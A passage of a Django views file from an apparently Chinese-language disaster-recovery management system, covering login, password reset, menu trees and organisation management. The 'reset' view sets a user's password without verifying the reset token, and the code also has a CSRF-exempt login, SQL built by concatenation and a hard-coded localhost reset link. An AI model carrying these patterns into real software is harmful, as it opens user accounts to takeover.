report_submit_info.name = i.name\n report_submit_info.value = i.default_value\n report_submit_info.report_submit = report_submit_add\n report_submit_info.save()\n result[\"res\"] = \"发布成功。\"\n except Exception as e:\n print(e)\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n # 修改\n else:\n current_report_submit = current_report_submit[0]\n try:\n current_report_submit.state = \"1\"\n current_report_submit.person = person\n current_report_submit.write_time = write_time\n current_report_submit.report_time = report_time\n current_report_submit.save()\n result[\"res\"] = \"发布成功。\"\n except Exception as e:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n else:\n result[\"res\"] = \"网络异常。\"\n return JsonResponse(result)\n\n\ndef report_submit_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n report_time = request.POST.get(\"report_time\", \"\")\n\n length_tag = report_time.count(\"-\")\n if length_tag == 0:\n report_time = datetime.datetime.strptime(report_time, \"%Y\") if report_time else None\n report_time = report_time.replace(month=12, day=31) if report_time else None\n elif length_tag == 1:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m\") if report_time else None\n a, b = calendar.monthrange(report_time.year, report_time.month) if report_time else None\n report_time = datetime.datetime(year=report_time.year, month=report_time.month,\n day=b) if report_time else None\n elif length_tag == 2:\n report_time = datetime.datetime.strptime(report_time, \"%Y-%m-%d\") if report_time else None\n else:\n return HttpResponse(0)\n\n try:\n id = int(id)\n except:\n raise Http404()\n report = ReportModel.objects.filter(id=id)\n\n if report.exists():\n report = report[0]\n # 删除关联report_submit\n report_submit_set = report.reportsubmit_set.exclude(state=\"9\").filter(report_time=report_time)\n if report_submit_set.exists():\n for i in report_submit_set:\n i.state = \"9\"\n i.save()\n else:\n # 未创建,不需要删除\n return HttpResponse(2)\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n else:\n return HttpResponse(0)\n\n\ndef getfun(myfunlist, fun):\n try:\n if (fun.pnode_id is not None):\n if fun not in myfunlist:\n childfun = {}\n if (fun.pnode_id != 1):\n myfunlist = getfun(myfunlist, fun.pnode)\n myfunlist.append(fun)\n except:\n pass\n return myfunlist\n\n\ndef childfun(myfun, funid):\n pisselected = False\n for fun in myfun:\n if str(fun[\"id\"]) == str(funid):\n fun[\"isselected\"] = True\n pisselected = True\n else:\n returnfuns = childfun(fun[\"child\"], funid)\n fun[\"isselected\"] = returnfuns[\"isselected\"]\n fun[\"child\"] = returnfuns[\"fun\"]\n if returnfuns[\"isselected\"]:\n pisselected = returnfuns[\"isselected\"]\n return {\"fun\": myfun, \"isselected\": pisselected}\n\n\ndef getpagefuns(funid, request):\n funlist = request.session['funlist']\n pagefuns = []\n mycurfun = {}\n message_task = []\n task_nums = 0\n\n for fun in funlist:\n if str(fun[\"id\"]) == str(funid):\n fun[\"isselected\"] = True\n else:\n returnfuns = childfun(fun[\"child\"], funid)\n fun[\"isselected\"] = returnfuns[\"isselected\"]\n fun[\"child\"] = returnfuns[\"fun\"]\n\n curfun = Fun.objects.filter(id=int(funid))\n if len(curfun) > 0:\n myurl = curfun[0].url\n jsurl = curfun[0].url # /falconstorswitch/24\n if myurl:\n myurl = myurl[:-1]\n jsurl = jsurl[1:-1]\n curjsurl = jsurl.split('/')\n jsurl = '/' + curjsurl[0]\n\n mycurfun = {\n \"id\": curfun[0].id, \"name\": curfun[0].name, \"url\": myurl, \"jsurl\": jsurl\n }\n\n return {\"pagefuns\": funlist, \"curfun\": mycurfun, \"task_nums\": task_nums}\n\n\ndef test(request):\n if request.user.is_authenticated() and request.session['isadmin']:\n errors = []\n code = \"DLZX_JYTJ_FDL_NJH\"\n ret = get_target_data_recently(code)\n return render(request, 'test.html',\n {'username': request.user.userinfo.fullname, \"errors\": errors})\n else:\n return HttpResponseRedirect(\"/login\")\n\ndef getchildfun(myfun,funlist):\n mychildfun = []\n funs = myfun.children.order_by(\"sort\").exclude(state=\"9\")\n\n for fun in funs:\n if fun in funlist:\n url = fun.url if fun.url else \"\"\n # if len(fun.app.all()) > 0:\n if fun.app:\n url = fun.url + str(fun.id) + \"/\" if fun.url else \"\"\n returnfuns = getchildfun(fun,funlist)\n mychildfun.append({\n \"id\": fun.id, \"name\": fun.name, \"url\": url, \"icon\": fun.icon,\n \"isselected\": False, \"child\": returnfuns[\"fun\"],\n \"new_window\": fun.if_new_wd,\n })\n return {\"fun\": mychildfun}\n\n\ndef custom_personal_fun_list(if_superuser, userinfo_id):\n funlist = []\n if if_superuser == 1:\n allfunlist = Fun.objects.all()\n for fun in allfunlist:\n funlist.append(fun)\n else:\n try:\n with connection.cursor() as cursor:\n cursor.execute(\n \"select datacenter_fun.id from datacenter_group,datacenter_fun,datacenter_userinfo,datacenter_userinfo_group,datacenter_group_fun \"\n \"where datacenter_group.id=datacenter_userinfo_group.group_id and datacenter_group.id=datacenter_group_fun.group_id and \"\n \"datacenter_group_fun.fun_id=datacenter_fun.id and datacenter_userinfo.id=datacenter_userinfo_group.userinfo_id and userinfo_id= \"\n + str(userinfo_id) + \" order by datacenter_fun.sort\"\n )\n\n rows = cursor.fetchall()\n for row in rows:\n try:\n fun = Fun.objects.get(id=row[0])\n funlist = getfun(funlist, fun)\n except:\n pass\n finally:\n connection.close()\n for index, value in enumerate(funlist):\n if value.sort is None:\n value.sort = 0\n funlist = sorted(funlist, key=lambda fun: fun.sort)\n\n pagefuns = []\n\n for fun in funlist:\n if fun.pnode_id == 1:\n url = fun.url if fun.url else \"\"\n url = fun.url if fun.url else \"\"\n # if len(fun.app.all()) > 0:\n if fun.app:\n url = fun.url + str(fun.id) + \"/\" if fun.url else \"\"\n returnfuns = getchildfun(fun,funlist)\n pagefuns.append({\n \"id\": fun.id, \"name\": fun.name, \"url\": url, \"icon\": fun.icon,\n \"isselected\": False, \"child\": returnfuns[\"fun\"],\n \"new_window\": fun.if_new_wd,\n })\n\n return pagefuns\n\n\ndef index(request, funid):\n if request.user.is_authenticated():\n request.session['funlist'] = custom_personal_fun_list(request.user.is_superuser, request.user.userinfo.id)\n # 右上角消息任务\n return render(request, \"index.html\",\n {'username': request.user.userinfo.fullname, \"homepage\": True,\n \"pagefuns\": getpagefuns(funid, request),\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef login(request):\n \"\"\"\n @param login?error=n\n n=1 用户不存在\n n=2 用户认证失败\n \"\"\"\n error_tag = request.GET.get(\"error\", \"\")\n error = \"\"\n try:\n error_tag = int(error_tag)\n except Exception:\n pass\n\n if error_tag == 1:\n error = \"用户登录失败。\"\n if error_tag == 2:\n error = \"用户认证失败。\"\n\n auth.logout(request)\n try:\n del request.session['ispuser']\n del request.session['isadmin']\n except KeyError:\n pass\n return render(request, 'login.html', locals())\n\n\n@csrf_exempt\ndef ad_login(request):\n \"\"\"\n @return login?error=n\n n=1 用户不存在\n n=2 用户认证失败\n \"\"\"\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n if request.user.is_authenticated():\n request.session.set_expiry(0)\n usertype = user.userinfo.usertype\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = user.is_superuser\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect('/login?error=2')\n else:\n return HttpResponseRedirect('/login?error=1')\n\n\ndef userlogin(request):\n if request.method == 'POST':\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n # 加入AD认证\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n myuserinfo = user.userinfo\n login_count = 0\n myuserinfo.login_count = login_count\n myuserinfo.retry_time = datetime.datetime.now()\n myuserinfo.save()\n if myuserinfo.forgetpassword:\n myuserinfo.forgetpassword = \"\"\n myuserinfo.save()\n if request.user.is_authenticated():\n if myuserinfo.state == \"0\":\n result = \"success1\"\n else:\n result = \"success\"\n if (request.POST.get('remember', '') != '1'):\n request.session.set_expiry(0)\n usertype = user.userinfo.usertype\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = user.is_superuser\n else:\n result = \"登录失败,请于客服联系。\"\n else:\n user = User.objects.get(username=username)\n login_count = user.userinfo.login_count if user.userinfo.login_count else 0\n if login_count < 4:\n login_count += 1\n user.userinfo.login_count = login_count\n user.userinfo.retry_time = datetime.datetime.now()\n user.userinfo.save()\n result = \"用户名或密码不正确。\"\n elif login_count == 5:\n retry_time = user.userinfo.retry_time\n now_time = datetime.datetime.now()\n mins = int((now_time - retry_time).total_seconds() / 60)\n if mins < 10:\n result = \"登录频繁,请于10分钟后登录。\"\n else:\n login_count = 1\n user.userinfo.login_count = login_count\n user.userinfo.retry_time = datetime.datetime.now()\n user.userinfo.save()\n result = \"用户名或密码不正确。\"\n else:\n user.userinfo.login_count = login_count + 1\n user.userinfo.retry_time = datetime.datetime.now()\n user.userinfo.save()\n result = \"登录频繁,请于10分钟后登录。\"\n login_count = login_count + 1\n return JsonResponse({\n 'res': result,\n 'login_count': login_count,\n })\n\n\ndef forgetPassword(request):\n if request.method == 'POST':\n result = \"\"\n email = request.POST.get('email', '')\n alluser = User.objects.filter(email=email)\n if (len(alluser) <= 0):\n result = u\"邮箱\" + email + u'不存在。'\n else:\n myuserinfo = alluser[0].userinfo\n url = str(uuid.uuid1())\n subject = u'密码重置'\n message = u'用户:' + alluser[0].username + u'您好。' \\\n + u\"\\n您在云灾备系统申请了密码重置,点击链接进入密码重置页面:\" \\\n + u\"http://127.0.0.1:8000/resetpassword/\" + url\n send_mail(subject, message, settings.EMAIL_HOST_USER,\n [alluser[0].email])\n myuserinfo.forgetpassword = url\n myuserinfo.save()\n result = \"邮件发送成功,请注意查收。\"\n return HttpResponse(result)\n\n\ndef resetpassword(request, offset):\n myuserinfo = UserInfo.objects.filter(forgetpassword=offset)\n if len(myuserinfo) > 0:\n myusername = myuserinfo[0].user.username\n return render(request, 'reset.html', {\"myusername\": myusername})\n else:\n return render(request, 'reset.html', {\"error\": True})\n\n\ndef reset(request):\n if request.method == 'POST':\n result = \"\"\n myusername = request.POST.get('username', '')\n password = request.POST.get('password', '')\n\n alluser = User.objects.filter(username=myusername)\n if (len(alluser) > 0):\n alluser[0].set_password(password)\n alluser[0].save()\n myuserinfo = alluser[0].userinfo\n myuserinfo.forgetpassword = \"\"\n myuserinfo.save()\n if myuserinfo.state == \"0\":\n result = \"success1\"\n else:\n result = \"success\"\n auth.logout(request)\n user = auth.authenticate(username=myusername, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n usertype = myuserinfo.type\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = alluser[0].is_superuser\n else:\n result = \"用户不存在。\"\n return HttpResponse(result)\n\n\ndef password(request):\n if request.user.is_authenticated():\n return render(request, 'password.html', {\"myusername\": request.user.username})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef userpassword(request):\n if request.method == 'POST':\n result = \"\"\n username = request.POST.get('username', '')\n oldpassword = request.POST.get('oldpassword', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=oldpassword)\n if user is not None and user.is_active:\n alluser = User.objects.filter(username=username)\n if (len(alluser) > 0):\n alluser[0].set_password(password)\n alluser[0].save()\n myuserinfo = alluser[0].userinfo\n myuserinfo.forgetpassword = \"\"\n myuserinfo.save()\n result = \"success\"\n auth.logout(request)\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n usertype = myuserinfo.type\n if usertype == '1':\n request.session['ispuser'] = True\n else:\n request.session['ispuser'] = False\n request.session['isadmin'] = alluser[0].is_superuser\n else:\n result = \"用户异常,修改密码失败。\"\n else:\n result = \"旧密码输入错误,请重新输入。\"\n\n return HttpResponse(result)\n\n\ndef get_fun_tree(parent, selectid, all_apps, all_nodes, all_works):\n nodes = []\n\n children = [child for child in all_nodes if child['pnode_id'] == parent['id']]\n for child in children:\n node = dict()\n node[\"text\"] = child['name']\n node[\"id\"] = child['id']\n node[\"type\"] = child['funtype']\n # app应用\n # 当前节点的所有外键\n current_app_id = child['app_id']\n\n app_select_list = [{\n \"app_name\": \"\",\n \"id\": \"\",\n \"app_state\": \"\",\n }]\n for app in all_apps:\n works = [{\n 'id': work['id'],\n 'name': work['name']\n } for work in all_works if work['app_id'] == app['id']]\n\n app_select_list.append({\n \"app_name\": app['name'],\n \"id\": app['id'],\n \"app_state\": \"selected\" if app['id'] == current_app_id else \"\",\n \"works\": str(works),\n })\n\n selected_work = child['work_id']\n\n node[\"data\"] = {\n \"url\": child['url'],\n \"icon\": child['icon'],\n \"pname\": parent['name'],\n \"app_list\": app_select_list,\n \"app_div_show\": True if child['funtype'] == \"fun\" else False,\n \"selected_work\": selected_work,\n \"new_window\": child[\"if_new_wd\"],\n }\n node[\"children\"] = get_fun_tree(child, selectid, all_apps, all_nodes, all_works)\n\n try:\n if int(selectid) == child['id']:\n node[\"state\"] = {\"selected\": True}\n except:\n pass\n nodes.append(node)\n return nodes\n\n\ndef function(request, funid):\n if request.user.is_authenticated():\n try:\n errors = []\n title = \"请选择功能\"\n selectid = \"\"\n id = \"\"\n pid = \"\"\n pname = \"\"\n name = \"\"\n mytype = \"\"\n url = \"\"\n icon = \"\"\n app_list = []\n pre_app_select_list = []\n works_select_list = []\n hiddendiv = \"hidden\"\n app_hidden_div = \"\"\n\n visited_url_div = \"\"\n new_window_div = \"\"\n\n all_apps = App.objects.exclude(state=\"9\").values()\n all_works = Work.objects.exclude(state='9').values('id', 'name', 'app_id')\n\n if request.method == 'POST':\n hiddendiv = \"\"\n id = request.POST.get('id')\n pid = request.POST.get('pid')\n pname = request.POST.get('pname')\n name = request.POST.get('name')\n mytype = request.POST.get('radio2')\n url = request.POST.get('url')\n icon = request.POST.get('icon')\n app = request.POST.get('app', '')\n works = request.POST.get('works', '')\n new_window = request.POST.get('new_window', '')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n pid = int(pid)\n except:\n raise Http404()\n if id == 0:\n selectid = pid\n title = \"新建\"\n else:\n selectid = id\n title = name\n\n try:\n works = int(works)\n except:\n pass\n\n if name.strip() == '':\n errors.append('功能名称不能为空。')\n else:\n try:\n pfun = Fun.objects.get(id=pid)\n except:\n raise Http404()\n try:\n if id == 0:\n sort = 1\n\n try:\n maxfun = Fun.objects.filter(\n pnode=pfun).latest('sort')\n sort = maxfun.sort + 1\n sort = maxfun.sort + 1\n except:\n pass\n funsave = Fun()\n funsave.pnode = pfun\n funsave.name = name\n funsave.funtype = mytype\n funsave.url = url\n funsave.icon = icon\n funsave.sort = sort if sort else None\n funsave.app_id = int(app) if app else None\n funsave.work_id = works\n funsave.if_new_wd = new_window\n funsave.save()\n\n title = name\n id = funsave.id\n selectid = id\n else:\n funsave = Fun.objects.get(id=id)\n if funsave.funtype == \"node\" and mytype == \"fun\" and len(\n funsave.children.exclude(state=\"9\")) > 0:\n errors.append('节点下还有其他节点或功能,无法修改为功能。')\n elif mytype == \"node\" and funsave.app:\n errors.append('功能下有关联应用,无法修改为节点。')\n else:\n funsave.name = name\n funsave.funtype = mytype\n funsave.url = url\n funsave.icon = icon\n funsave.app_id = int(app) if app else None\n funsave.work_id = works\n funsave.if_new_wd = new_window\n funsave.save()\n\n title = name\n # 保存成功后,重新刷新页面,重新构造app_select_list\n for c_app in all_apps:\n pre_app_select_list.append({\n \"app_name\": c_app['name'],\n \"id\": c_app['id'],\n \"app_state\": \"selected\" if str(c_app['id']) == app else \"\",\n })\n # 保存成功后,重新构造 works_select_list\n try:\n select_app = App.objects.get(id=app)\n except Exception as e:\n pass\n else:\n works_list = select_app.work_set.exclude(state='9')\n if works_list.exists():\n for work in works_list:\n if work.id == works:\n # selected\n works_select_list.append({\n 'id': work.id,\n 'name': work.name,\n 'selected': 'selected'\n })\n else:\n works_select_list.append({\n 'id': work.id,\n 'name': work.name,\n 'selected': ''\n })\n\n if mytype == \"node\":\n app_hidden_div = \"hidden\"\n visited_url_div = \"hidden\"\n new_window_div = \"hidden\"\n else:\n app_hidden_div = \"\"\n visited_url_div = \"\"\n new_window_div = \"\"\n\n # 功能节点修改后,更新funlist\n request.session['funlist'] = custom_personal_fun_list(request.user.is_superuser, request.user.userinfo.id)\n except Exception as e:\n print(e)\n errors.append('保存失败。')\n treedata = []\n\n all_nodes = Fun.objects.exclude(state='9').order_by('sort').values()\n rootnodes = [node for node in all_nodes if node['pnode_id'] == None]\n\n for rootnode in rootnodes:\n root = dict()\n root[\"text\"] = rootnode['name']\n root[\"id\"] = rootnode['id']\n root[\"type\"] = \"node\"\n\n # 当前节点的所有外键\n current_app_id = rootnode['app_id']\n\n app_select_list = [{\n \"app_name\": \"\",\n \"id\": \"\",\n \"app_state\": \"\",\n }]\n for app in all_apps:\n works = [{\n 'id': work['id'],\n 'name': work['name']\n } for work in all_works if work['app_id'] == app['id']]\n\n app_select_list.append({\n \"app_name\": app['name'],\n \"id\": app['id'],\n \"app_state\": \"selected\" if app['id'] == current_app_id else \"\",\n \"works\": str(works),\n })\n\n selected_work = rootnode['work_id']\n\n root[\"data\"] = {\n \"url\": rootnode['url'],\n \"icon\": rootnode['icon'],\n \"pname\": \"无\",\n \"app_list\": app_select_list,\n \"app_div_show\": True if rootnode['funtype'] == \"fun\" else False,\n \"selected_work\": selected_work,\n \"new_window\": rootnode[\"if_new_wd\"],\n }\n try:\n if int(selectid) == rootnode['id']:\n root[\"state\"] = {\"opened\": True, \"selected\": True}\n else:\n root[\"state\"] = {\"opened\": True}\n except:\n root[\"state\"] = {\"opened\": True}\n root[\"children\"] = get_fun_tree(rootnode, selectid, all_apps, all_nodes, all_works)\n treedata.append(root)\n\n treedata = json.dumps(treedata)\n return render(request, 'function.html', {\n 'username': request.user.userinfo.fullname, 'errors': errors, \"id\": id,\n \"pid\": pid, \"pname\": pname, \"name\": name, \"url\": url, \"icon\": icon, \"title\": title,\n \"mytype\": mytype, \"hiddendiv\": hiddendiv, \"treedata\": treedata,\n \"works_select_list\": works_select_list,\n \"app_select_list\": pre_app_select_list, \"app_hidden_div\": app_hidden_div,\n \"pagefuns\": getpagefuns(funid, request),\n \"visited_url_div\": visited_url_div,\n \"new_window_div\": new_window_div,\n })\n except Exception as e:\n print(e)\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef fundel(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n allfun = Fun.objects.filter(id=id)\n if (len(allfun) > 0):\n sort = allfun[0].sort\n pfun = allfun[0].pnode\n allfun[0].delete()\n sortfuns = Fun.objects.filter(pnode=pfun).filter(sort__gt=sort)\n if len(sortfuns) > 0:\n for sortfun in sortfuns:\n try:\n sortfun.sort = sortfun.sort - 1\n sortfun.save()\n except:\n pass\n\n # 删除时更新右侧菜单\n\n request.session['funlist'] = custom_personal_fun_list(request.user.is_superuser, request.user.userinfo.id)\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef funmove(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n parent = request.POST.get('parent', '')\n old_parent = request.POST.get('old_parent', '')\n position = request.POST.get('position', '')\n old_position = request.POST.get('old_position', '')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n parent = int(parent)\n except:\n raise Http404()\n try:\n position = int(position)\n except:\n raise Http404()\n try:\n parent = int(parent)\n except:\n raise Http404()\n try:\n old_position = int(old_position)\n except:\n raise Http404()\n\n oldpfun = Fun.objects.get(id=old_parent)\n oldsort = old_position + 1\n oldfuns = Fun.objects.filter(\n pnode=oldpfun).filter(sort__gt=oldsort)\n\n pfun = Fun.objects.get(id=parent)\n sort = position + 1\n funs = Fun.objects.filter(pnode=pfun).filter(\n sort__gte=sort).exclude(id=id)\n\n if pfun.funtype == \"fun\":\n return HttpResponse(\"类���\")\n else:\n if (len(oldfuns) > 0):\n for oldfun in oldfuns:\n try:\n oldfun.sort = oldfun.sort - 1\n oldfun.save()\n except:\n pass\n\n if (len(funs) > 0):\n for fun in funs:\n try:\n fun.sort = fun.sort + 1\n fun.save()\n except:\n pass\n myfun = Fun.objects.get(id=id)\n try:\n myfun.pnode = pfun\n myfun.sort = sort\n myfun.save()\n except:\n pass\n if parent != old_parent:\n return HttpResponse(pfun.name + \"^\" + str(pfun.id))\n else:\n return HttpResponse(\"0\")\n\n\ndef get_org_tree(parent, selectid, allgroup):\n nodes = []\n children = parent.children.order_by(\"sort\").exclude(state=\"9\")\n for child in children:\n node = {}\n node[\"text\"] = child.fullname\n node[\"id\"] = child.id\n node[\"type\"] = child.usertype\n if child.usertype == \"org\":\n myallgroup = []\n for group in allgroup:\n myallgroup.append({\"groupname\": group.name, \"id\": group.id})\n node[\"data\"] = {\"remark\": child.remark,\n \"pname\": parent.fullname, \"myallgroup\": myallgroup}\n if child.usertype == \"user\":\n noselectgroup = []\n selectgroup = []\n allselectgroup = child.group.exclude(state=\"9\")\n for group in allgroup:\n if group in allselectgroup:\n selectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n else:\n noselectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n node[\"data\"] = {\"pname\": parent.fullname, \"username\": child.user.username, \"fullname\": child.fullname,\n \"phone\": child.phone, \"email\": child.user.email, \"noselectgroup\": noselectgroup,\n \"selectgroup\": selectgroup}\n node[\"children\"] = get_org_tree(child, selectid, allgroup)\n try:\n if int(selectid) == child.id:\n node[\"state\"] = {\"selected\": True}\n except:\n pass\n nodes.append(node)\n return nodes\n\n\ndef organization(request, funid):\n if request.user.is_authenticated():\n try:\n errors = []\n title = \"请选择组织\"\n selectid = \"\"\n id = \"\"\n pid = \"\"\n pname = \"\"\n noselectgroup = []\n selectgroup = []\n username = \"\"\n fullname = \"\"\n orgname = \"\"\n phone = \"\"\n email = \"\"\n password = \"\"\n mytype = \"\"\n remark = \"\"\n hiddendiv = \"hidden\"\n hiddenuser = \"hidden\"\n hiddenorg = \"hidden\"\n newpassword = \"hidden\"\n editpassword = \"\"\n\n allgroup = Group.objects.exclude(state=\"9\")\n if request.method == 'POST':\n hiddendiv = \"\"\n id = request.POST.get('id')\n pid = request.POST.get('pid')\n mytype = request.POST.get('mytype')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n pid = int(pid)\n except:\n raise Http404()\n\n if 'usersave' in request.POST:\n hiddenuser = \"\"\n hiddenorg = \"hidden\"\n grouplist = request.POST.getlist('source')\n noselectgroup = []\n selectgroup = []\n for group in allgroup:\n if str(group.id) in grouplist:\n selectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n else:\n noselectgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n pname = request.POST.get('pname')\n username = request.POST.get('myusername', '')\n fullname = request.POST.get('fullname', '')\n phone = request.POST.get('phone', '')\n email = request.POST.get('email', '')\n password = request.POST.get('password', '')\n\n newpassword = \"\"\n editpassword = \"hidden\"\n\n if id == 0:\n selectid = pid\n title = \"新建\"\n alluser = User.objects.filter(\n username=username)\n if username.strip() == '':\n errors.append('用户名不能为空。')\n else:\n if password.strip() == '':\n errors.append('密码不能为空。')\n else:\n if fullname.strip() == '':\n errors.append('姓名不能为空。')\n else:\n if (len(alluser) > 0):\n errors.append(\n '用户名:' + username + '已存在。')\n else:\n try:\n newuser = User()\n newuser.username = username\n newuser.set_password(\n password)\n newuser.email = email\n newuser.save()\n # 用户扩展信息 profile\n profile = UserInfo() # e*************************\n profile.user_id = newuser.id\n profile.phone = phone\n profile.fullname = fullname\n\n try:\n porg = UserInfo.objects.get(\n id=pid)\n except:\n raise Http404()\n profile.pnode = porg\n profile.usertype = \"user\"\n sort = 1\n try:\n maxorg = UserInfo.objects.filter(\n pnode=porg).latest('sort')\n sort = maxorg.sort + 1\n except:\n pass\n profile.sort = sort\n profile.save()\n for group in grouplist:\n try:\n group = int(\n group)\n mygroup = allgroup.get(\n id=group)\n profile.group.add(\n mygroup)\n except ValueError:\n raise Http404()\n title = fullname\n selectid = profile.id\n id = profile.id\n newpassword = \"hidden\"\n editpassword = \"\"\n except ValueError:\n raise Http404()\n else:\n selectid = id\n title = fullname\n exalluser = User.objects.filter(\n username=username)\n if username.strip() == '':\n errors.append('用户名不能为空。')\n else:\n if fullname.strip() == '':\n errors.append('姓名不能为空。')\n else:\n if (len(exalluser) > 0 and exalluser[0].userinfo.id != id):\n errors.append(\n '用户名:' + username + '已存在。')\n else:\n try:\n alluserinfo = UserInfo.objects.get(\n id=id)\n alluser = alluserinfo.user\n alluser.email = email\n alluser.save()\n # 用户扩展信息 profile\n alluserinfo.phone = phone\n alluserinfo.fullname = fullname\n\n alluserinfo.save()\n alluserinfo.group.clear()\n for group in grouplist:\n try:\n group = int(group)\n mygroup = allgroup.get(\n id=group)\n alluserinfo.group.add(\n mygroup)\n except ValueError:\n raise Http404()\n title = fullname\n except:\n errors.append('保存失败。')\n else:\n if 'orgsave' in request.POST:\n hiddenuser = \"hidden\"\n hiddenorg = \"\"\n pname = request.POST.get('orgpname')\n orgname = request.POST.get('orgname', '')\n remark = request.POST.get('remark', '')\n\n if id == 0:\n selectid = pid\n title = \"新建\"\n try:\n porg = UserInfo.objects.get(id=pid)\n except:\n raise Http404()\n allorg = UserInfo.objects.filter(\n fullname=orgname, pnode=porg)\n if orgname.strip() == '':\n errors.append('组织名称不能为空。')\n else:\n if (len(allorg) > 0):\n errors.append(orgname + '已存在。')\n else:\n try:\n # 虚假用户,避免SQLServer中唯一索引null重复\n newuser = User()\n tmp_datetime = str(datetime.datetime.now())[-20:-1].encode('utf-8')\n newuser.username = base64.b64encode(tmp_datetime) # 注意username的长度\n newuser.password = ''\n newuser.email = ''\n newuser.is_active = 0\n newuser.is_staff = 0\n newuser.save()\n\n profile = UserInfo() # e*************************\n profile.user = newuser\n profile.fullname = orgname\n profile.pnode = porg\n profile.remark = remark\n profile.usertype = \"org\"\n sort = 1\n try:\n maxorg = UserInfo.objects.filter(\n pnode=porg).latest('sort')\n sort = maxorg.sort + 1\n except:\n pass\n profile.sort = sort\n profile.save()\n title = orgname\n selectid = profile.id\n id = profile.id\n except ValueError:\n raise Http404()\n else:\n selectid = id\n title = orgname\n try:\n porg = UserInfo.objects.get(id=pid)\n except:\n raise Http404()\n exalluser = UserInfo.objects.filter(\n fullname=orgname, pnode=porg).exclude(state=\"9\")\n if orgname.strip() == '':\n errors.append('组织名称不能为空。')\n else:\n if (len(exalluser) > 0 and exalluser[0].id != id):\n errors.append(username + '已存在。')\n else:\n try:\n alluserinfo = UserInfo.objects.get(\n id=id)\n alluserinfo.fullname = orgname\n alluserinfo.remark = remark\n alluserinfo.save()\n title = orgname\n except:\n errors.append('保存失败。')\n treedata = []\n rootnodes = UserInfo.objects.order_by(\"sort\").exclude(\n state=\"9\").filter(pnode=None, usertype=\"org\")\n if len(rootnodes) > 0:\n for rootnode in rootnodes:\n root = {}\n root[\"text\"] = rootnode.fullname\n root[\"id\"] = rootnode.id\n root[\"type\"] = \"org\"\n myallgroup = []\n for group in allgroup:\n myallgroup.append(\n {\"groupname\": group.name, \"id\": group.id})\n root[\"data\"] = {\"remark\": rootnode.remark,\n \"pname\": \"无\", \"myallgroup\": myallgroup}\n try:\n if int(selectid) == rootnode.id:\n root[\"state\"] = {\"opened\": True, \"selected\": True}\n else:\n root[\"state\"] = {\"opened\": True}\n except:\n root[\"state\"] = {\"opened\": True}\n root[\"children\"] = get_org_tree(\n rootnode, selectid, allgroup)\n treedata.append(root)\n treedata = json.dumps(treedata)\n return render(request, 'organization.html',\n {'username': request.user.userinfo.fullname, 'errors': errors, \"id\": id, \"orgname\": orgname,\n \"pid\": pid, \"pname\": pname, \"fullname\": fullname, \"phone\": phone, \"myusername\": username,\n \"email\": email, \"password\": password, \"noselectgroup\": noselectgroup,\n \"selectgroup\": selectgroup, \"remark\": remark, \"title\": title, \"mytype\": mytype,\n \"hiddenuser\": hiddenuser, \"hiddenorg\": hiddenorg, \"newpassword\": newpassword,\n \"editpassword\": editpassword, \"hiddendiv\": hiddendiv, \"treedata\": treedata,\n \"pagefuns\": getpagefuns(funid, request)})\n\n except Exception as e:\n print(e)\n return HttpResponseRedirect(\"/index\")\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef orgdel(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n userinfo = UserInfo.objects.get(id=id)\n sort = userinfo.sort\n userinfo.state = \"9\"\n userinfo.sort = 9999\n userinfo.save()\n\n if userinfo.usertype == \"user\":\n user = userinfo.user\n user.is_active = 0\n user.save()\n\n userinfos = UserInfo.objects.filter(pnode=userinfo.pnode).filter(\n sort__gt=sort).exclude(state=\"9\")\n if (len(userinfos) > 0):\n for myuserinfo in userinfos:\n try:\n myuserinfo.sort = myuserinfo.sort - 1\n myuserinfo.save()\n except:\n pass\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef orgmove(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n parent = request.POST.get('parent', '')\n old_parent = request.POST.get('old_parent', '')\n position = request.POST.get('position', '')\n old_position = request.POST.get('old_position', '')\n try:\n id = int(id)\n except:\n raise Http404()\n try:\n parent = int(parent)\n except:\n raise Http404()\n try:\n position = int(position)\n except:\n raise Http404()\n try:\n position = int(position)\n except:\n raise Http404()\n try:\n old_position = int(old_position)\n except:\n raise Http404()\n oldpuserinfo = UserInfo.objects.get(id=old_parent)\n oldsort = old_position + 1\n olduserinfos = UserInfo.objects.filter(\n 